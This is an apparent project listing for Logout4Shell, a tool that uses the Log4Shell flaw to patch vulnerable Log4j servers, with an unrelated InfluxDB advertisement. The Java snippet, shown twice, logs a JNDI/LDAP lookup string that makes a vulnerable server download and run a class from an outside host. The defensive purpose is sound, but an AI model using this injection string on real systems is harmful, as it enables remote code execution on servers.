-
Logout4Shell
Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell (by freakynit)
-
InfluxDB
Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class); public static void main(String[] args) { // This will hit hhe server and download the class that will patch live log4j logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); // The RCE should not work now... if you still see message printed // such as: "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS", // that means the patch didn't work. // Raise issue here: https://github.com/freakynit/Logout4Shell // or here (original version): https://github.com/Cybereason/Logout4Shell logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); } }
public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class); public static void main(String[] args) { // This will hit hhe server and download the class that will patch live log4j logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); // The RCE should not work now... if you still see message printed // such as: "FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS", // that means the patch didn't work. // Raise issue here: https://github.com/freakynit/Logout4Shell // or here (original version): https://github.com/Cybereason/Logout4Shell logger.error("${jndi:ldap://patchlog4j2live.xyz:1389/a}"); } }